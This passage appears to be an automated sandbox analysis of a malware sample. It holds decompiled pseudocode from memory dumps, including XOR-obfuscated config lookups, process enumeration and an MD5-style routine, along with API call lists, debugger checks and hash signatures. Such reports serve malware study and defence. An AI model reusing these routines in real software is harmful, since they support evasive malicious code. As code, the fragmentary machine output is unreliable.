                                                                                                                                  					if(_t50 == 0) {
                                                                                                                                  						L41:
                                                                                                                                  						 *0xa3d284 = 5;
                                                                                                                                  						goto L42;
                                                                                                                                  					} else {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                                                  							goto L41;
                                                                                                                                  						} else {
                                                                                                                                  							L42:
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t51 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t75 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  								_t51 = E00A33BB8(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                                                  							}
                                                                                                                                  							if(_t51 != 0) {
                                                                                                                                  								_push(_t51);
                                                                                                                                  								_t72 = 0x10;
                                                                                                                                  								_t73 = E00A349B8(_t72);
                                                                                                                                  								if(_t73 != 0) {
                                                                                                                                  									_push(_t73);
                                                                                                                                  									E00A34B98();
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t52 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t70 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  								_t52 = E00A33BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                                                  							}
                                                                                                                                  							if(_t52 != 0 && E00A349B8(0, _t52) != 0) {
                                                                                                                                  								_t121 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  								E00A39311(_t121 + 4, _t68);
                                                                                                                                  							}
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t53 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t65 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  								_t53 = E00A33BB8(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                                                  							}
                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                  								L59:
                                                                                                                                  								_t54 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  								_t22 = _t54 + 0xa3e252; // 0x616d692f
                                                                                                                                  								 *0xa3d30c = _t22;
                                                                                                                                  								goto L60;
                                                                                                                                  							} else {
                                                                                                                                  								_t64 = E00A349B8(0, _t53);
                                                                                                                                  								 *0xa3d30c = _t64;
                                                                                                                                  								if(_t64 != 0) {
                                                                                                                                  									L60:
                                                                                                                                  									if(_t103 == 0) {
                                                                                                                                  										_t56 = 0;
                                                                                                                                  									} else {
                                                                                                                                  										_t61 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  										_t56 = E00A33BB8(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                                  									}
                                                                                                                                  									if(_t56 == 0) {
                                                                                                                                  										_t57 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  										_t23 = _t57 + 0xa3e79a; // 0x6976612e
                                                                                                                                  										_t58 = _t23;
                                                                                                                                  									} else {
                                                                                                                                  										_t58 = E00A349B8(0, _t56);
                                                                                                                                  									}
                                                                                                                                  									 *0xa3d380 = _t58;
                                                                                                                                  									HeapFree( *0xa3d270, 0, _t103);
                                                                                                                                  									_v12 = 0;
                                                                                                                                  									goto L67;
                                                                                                                                  								}
                                                                                                                                  								goto L59;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}






































                                                                                                                                  0x00a34ea1
                                                                                                                                  0x00a34eae
                                                                                                                                  0x00a34eae
                                                                                                                                  0x00a34eb9
                                                                                                                                  0x00a34ec5
                                                                                                                                  0x00a34eca
                                                                                                                                  0x00a34eca
                                                                                                                                  0x00a34ebb
                                                                                                                                  0x00a34ebe
                                                                                                                                  0x00a34ebe
                                                                                                                                  0x00a34ed8
                                                                                                                                  0x00a34edd
                                                                                                                                  0x00a34ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34e8b
                                                                                                                                  0x00a34e7a
                                                                                                                                  0x00a34de3
                                                                                                                                  0x00a34dd7

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34CE5
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34D17
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34D49
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34D7B
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34DAD
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34DDF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00A35390,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008,?,00A35390), ref: 00A34EDD
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008,?,00A35390), ref: 00A34EF0
                                                                                                                                    • Part of subcall function 00A349B8: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,00A35390,00A34EC3,00000000,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005), ref: 00A349C1
                                                                                                                                    • Part of subcall function 00A349B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,00A35390), ref: 00A349E4
                                                                                                                                    • Part of subcall function 00A349B8: memset.NTDLL ref: 00A349F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3442150357-8415677
                                                                                                                                  • Opcode ID: 071e4380a465fd18f1c0a16c5b07e4366cfd8a657f1983709157bb072e0983ca
                                                                                                                                  • Instruction ID: 5361572802014de9321f3ec5169145aad36c920d685cb83ea1ee6bf17682adb8
                                                                                                                                  • Opcode Fuzzy Hash: 071e4380a465fd18f1c0a16c5b07e4366cfd8a657f1983709157bb072e0983ca
                                                                                                                                  • Instruction Fuzzy Hash: 11814E71A00744EFCB20EBF8AE84D9BB7F9AB4C740F344965B011D7215EA35EE459B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E8E5
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E90E
                                                                                                                                  • GetACP.KERNEL32(?,?,6E93EB6A,?,00000000), ref: 6E93E923
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                  • Opcode ID: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction ID: 4318d4e15fb3c2a6cba4e2a94113be2d0a92a1864bfaa58d4dacbab557bf9533
                                                                                                                                  • Opcode Fuzzy Hash: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction Fuzzy Hash: 5921D822E54325EAD7A48BD9C901BCB77BFEF45B54B624824E905D7508F732DD40CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D1825() {
                                                                                                                                  				void* _t1;
                                                                                                                                  				unsigned int _t3;
                                                                                                                                  				void* _t4;
                                                                                                                                  				long _t5;
                                                                                                                                  				void* _t6;
                                                                                                                                  				intOrPtr _t10;
                                                                                                                                  				void* _t14;
                                                                                                                                  
                                                                                                                                  				_t10 =  *0x6e8d41b0;
                                                                                                                                  				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                  				 *0x6e8d41bc = _t1;
                                                                                                                                  				if(_t1 == 0) {
                                                                                                                                  					return GetLastError();
                                                                                                                                  				}
                                                                                                                                  				_t3 = GetVersion();
                                                                                                                                  				if(_t3 != 5) {
                                                                                                                                  					L4:
                                                                                                                                  					if(_t14 <= 0) {
                                                                                                                                  						_t4 = 0x32;
                                                                                                                                  						return _t4;
                                                                                                                                  					} else {
                                                                                                                                  						goto L5;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					if(_t3 >> 8 > 0) {
                                                                                                                                  						L5:
                                                                                                                                  						 *0x6e8d41ac = _t3;
                                                                                                                                  						_t5 = GetCurrentProcessId();
                                                                                                                                  						 *0x6e8d41a8 = _t5;
                                                                                                                                  						 *0x6e8d41b0 = _t10;
                                                                                                                                  						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                  						 *0x6e8d41a4 = _t6;
                                                                                                                                  						if(_t6 == 0) {
                                                                                                                                  							 *0x6e8d41a4 =  *0x6e8d41a4 | 0xffffffff;
                                                                                                                                  						}
                                                                                                                                  						return 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t14 = _t3 - _t3;
                                                                                                                                  						goto L4;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E8D15D1), ref: 6E8D1834
                                                                                                                                  • GetVersion.KERNEL32 ref: 6E8D1843
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6E8D185F
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E8D1878
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 845504543-608512568
                                                                                                                                  • Opcode ID: a6a48bc34ee3d96a207443e1a5ac1028c3b294dea7ba096c538c3ed540604a22
                                                                                                                                  • Instruction ID: 2563f1d27fc2e3b7335399403f5d86c595fded0b8a7a64d026a8af4ca5b0ea5d
                                                                                                                                  • Opcode Fuzzy Hash: a6a48bc34ee3d96a207443e1a5ac1028c3b294dea7ba096c538c3ed540604a22
                                                                                                                                  • Instruction Fuzzy Hash: A8F0C230A84B159FFF40CFA9AC1A7453BA4EB87711F00445AE509E61C4E3B0884BCFC4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 597776487-0
                                                                                                                                  • Opcode ID: e52d9b17d353fe781ddb5d99d049edb0a489194cc29b845949c7edd21ede8afa
                                                                                                                                  • Instruction ID: 40db86d213b3e28abae1ab7155b046fa1296401fb8678ee60d0cc2525e22bb79
                                                                                                                                  • Opcode Fuzzy Hash: e52d9b17d353fe781ddb5d99d049edb0a489194cc29b845949c7edd21ede8afa
                                                                                                                                  • Instruction Fuzzy Hash: AEC126719142259FDB108FF88850BEE7BBEAF96358F344969D490AB285F731CA42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E163
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E18E
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E222
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E230
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E93E2F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4147378913-0
                                                                                                                                  • Opcode ID: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction ID: c6d8739dd68596a371a97e8dcb328ee0b019f3e5ea5c901a74b8c575f3f97c1a
                                                                                                                                  • Opcode Fuzzy Hash: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction Fuzzy Hash: 58710571604326AAEB659BF5CC55BAB73ACEF95304F30082AE919D7280EB70ED40CF51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F2FB
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F331
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E93EB2D
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 6E93EB76
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 6E93EB85
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E93EBCD
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E93EBEC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 949163717-0
                                                                                                                                  • Opcode ID: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction ID: f5b76edcd0818ccb7702ed09539865fab5fd7df22fd364fd79be819ae7d38921
                                                                                                                                  • Opcode Fuzzy Hash: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction Fuzzy Hash: B7515B71A0072AABEF51DFE6CC44AAEB7BCBF59304F24046AA911E7180E770DD408F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00A34A03() {
                                                                                                                                  				char _v264;
                                                                                                                                  				void* _v300;
                                                                                                                                  				int _t8;
                                                                                                                                  				intOrPtr _t9;
                                                                                                                                  				int _t15;
                                                                                                                                  				void* _t17;
                                                                                                                                  
                                                                                                                                  				_t15 = 0;
                                                                                                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                  				if(_t17 != 0) {
                                                                                                                                  					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                  					while(_t8 != 0) {
                                                                                                                                  						_t9 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  						_t2 = _t9 + 0xa3ee3c; // 0x73617661
                                                                                                                                  						_push( &_v264);
                                                                                                                                  						if( *0xa3d110() != 0) {
                                                                                                                                  							_t15 = 1;
                                                                                                                                  						} else {
                                                                                                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						L7:
                                                                                                                                  						CloseHandle(_t17);
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  				L8:
                                                                                                                                  				return _t15;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A34A13
                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00A34A26
                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00A34A52
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A34A61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                  • Opcode ID: 986503825d83895b7a79839604321646fe1400658c17f27eb788142872e16ff6
                                                                                                                                  • Instruction ID: f72cb21de75beaf67882c3e0de91c92859049105fdcf83bd255ac26fab31e529
                                                                                                                                  • Opcode Fuzzy Hash: 986503825d83895b7a79839604321646fe1400658c17f27eb788142872e16ff6
                                                                                                                                  • Instruction Fuzzy Hash: 95F05072900124ABD720E766DD09EEB33ACDFC9350F0000A2F555D3000EB24EE56C7B5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 6E916DAB
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E916DB5
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 6E916DC2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: 47761f88c45a731c83d21ab22f6b35a991cdcae3aa383676be073499e7e65542
                                                                                                                                  • Instruction ID: d16559b2027dae4ae9ed6ea81ee8ef1e83c14cc1fc4bcd0f1f020178f182e7e5
                                                                                                                                  • Opcode Fuzzy Hash: 47761f88c45a731c83d21ab22f6b35a991cdcae3aa383676be073499e7e65542
                                                                                                                                  • Instruction Fuzzy Hash: 2D31C474D1122C9BCB61DF68D9887CDBBB8BF58314F5045DAE41CA7290E7709B858F44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,6E92C324,?,000000FF,?,?,?,00000004), ref: 6E92C347
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,6E92C324,?,000000FF,?,?,?,00000004), ref: 6E92C34E
                                                                                                                                  • ExitProcess.KERNEL32 ref: 6E92C360
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 6424151bc1451747b8d23252184646a02ea736aeae8bc1b8d120af2664b9da79
                                                                                                                                  • Instruction ID: c7536a1dea7386dd66a2a7283ce7fc02fb313ee98de159c8e90482be50e8a825
                                                                                                                                  • Opcode Fuzzy Hash: 6424151bc1451747b8d23252184646a02ea736aeae8bc1b8d120af2664b9da79
                                                                                                                                  • Instruction Fuzzy Hash: 29E0B671024648EFDF15BBA4C958A8D3B7DFF49295F104824F9159A129EB35E981CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                                  • Instruction ID: 9cbde1340dd8c4f115542b9bb932c3229b912cf8551d9d68d52d0a04beb32d02
                                                                                                                                  • Opcode Fuzzy Hash: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                                  • Instruction Fuzzy Hash: B4F13C71E0521A9FDF14CFA9C8906DEBBB5FF88315F158269E819AB344D731AA01CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                  			E00A32B76(void* __ecx, intOrPtr* _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				intOrPtr _v60;
                                                                                                                                  				intOrPtr _v64;
                                                                                                                                  				intOrPtr _v68;
                                                                                                                                  				intOrPtr _v72;
                                                                                                                                  				void _v76;
                                                                                                                                  				intOrPtr* _t226;
                                                                                                                                  				signed int _t229;
                                                                                                                                  				signed int _t231;
                                                                                                                                  				signed int _t233;
                                                                                                                                  				signed int _t235;
                                                                                                                                  				signed int _t237;
                                                                                                                                  				signed int _t239;
                                                                                                                                  				signed int _t241;
                                                                                                                                  				signed int _t243;
                                                                                                                                  				signed int _t245;
                                                                                                                                  				signed int _t247;
                                                                                                                                  				signed int _t249;
                                                                                                                                  				signed int _t251;
                                                                                                                                  				signed int _t253;
                                                                                                                                  				signed int _t255;
                                                                                                                                  				signed int _t257;
                                                                                                                                  				signed int _t259;
                                                                                                                                  				signed int _t338;
                                                                                                                                  				signed char* _t348;
                                                                                                                                  				signed int _t349;
                                                                                                                                  				signed int _t351;
                                                                                                                                  				signed int _t353;
                                                                                                                                  				signed int _t355;
                                                                                                                                  				signed int _t357;
                                                                                                                                  				signed int _t359;
                                                                                                                                  				signed int _t361;
                                                                                                                                  				signed int _t363;
                                                                                                                                  				signed int _t365;
                                                                                                                                  				signed int _t367;
                                                                                                                                  				signed int _t376;
                                                                                                                                  				signed int _t378;
                                                                                                                                  				signed int _t380;
                                                                                                                                  				signed int _t382;
                                                                                                                                  				signed int _t384;
                                                                                                                                  				intOrPtr* _t400;
                                                                                                                                  				signed int* _t401;
                                                                                                                                  				signed int _t402;
                                                                                                                                  				signed int _t404;
                                                                                                                                  				signed int _t406;
                                                                                                                                  				signed int _t408;
                                                                                                                                  				signed int _t410;
                                                                                                                                  				signed int _t412;
                                                                                                                                  				signed int _t414;
                                                                                                                                  				signed int _t416;
                                                                                                                                  				signed int _t418;
                                                                                                                                  				signed int _t420;
                                                                                                                                  				signed int _t422;
                                                                                                                                  				signed int _t424;
                                                                                                                                  				signed int _t432;
                                                                                                                                  				signed int _t434;
                                                                                                                                  				signed int _t436;
                                                                                                                                  				signed int _t438;
                                                                                                                                  				signed int _t440;
                                                                                                                                  				signed int _t508;
                                                                                                                                  				signed int _t599;
                                                                                                                                  				signed int _t607;
                                                                                                                                  				signed int _t613;
                                                                                                                                  				signed int _t679;
                                                                                                                                  				void* _t682;
                                                                                                                                  				signed int _t683;
                                                                                                                                  				signed int _t685;
                                                                                                                                  				signed int _t690;
                                                                                                                                  				signed int _t692;
                                                                                                                                  				signed int _t697;
                                                                                                                                  				signed int _t699;
                                                                                                                                  				signed int _t718;
                                                                                                                                  				signed int _t720;
                                                                                                                                  				signed int _t722;
                                                                                                                                  				signed int _t724;
                                                                                                                                  				signed int _t726;
                                                                                                                                  				signed int _t728;
                                                                                                                                  				signed int _t734;
                                                                                                                                  				signed int _t740;
                                                                                                                                  				signed int _t742;
                                                                                                                                  				signed int _t744;
                                                                                                                                  				signed int _t746;
                                                                                                                                  				signed int _t748;
                                                                                                                                  
                                                                                                                                  				_t226 = _a4;
                                                                                                                                  				_t348 = __ecx + 2;
                                                                                                                                  				_t401 =  &_v76;
                                                                                                                                  				_t682 = 0x10;
                                                                                                                                  				do {
                                                                                                                                  					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                                                                                                  					_t401 =  &(_t401[1]);
                                                                                                                                  					_t348 =  &(_t348[4]);
                                                                                                                                  					_t682 = _t682 - 1;
                                                                                                                                  				} while (_t682 != 0);
                                                                                                                                  				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                  				_t683 =  *_t6;
                                                                                                                                  				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                  				_t402 =  *_t7;
                                                                                                                                  				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                  				_t349 =  *_t8;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                                                                                                  				_v8 = _t685;
                                                                                                                                  				_t690 = _v8;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
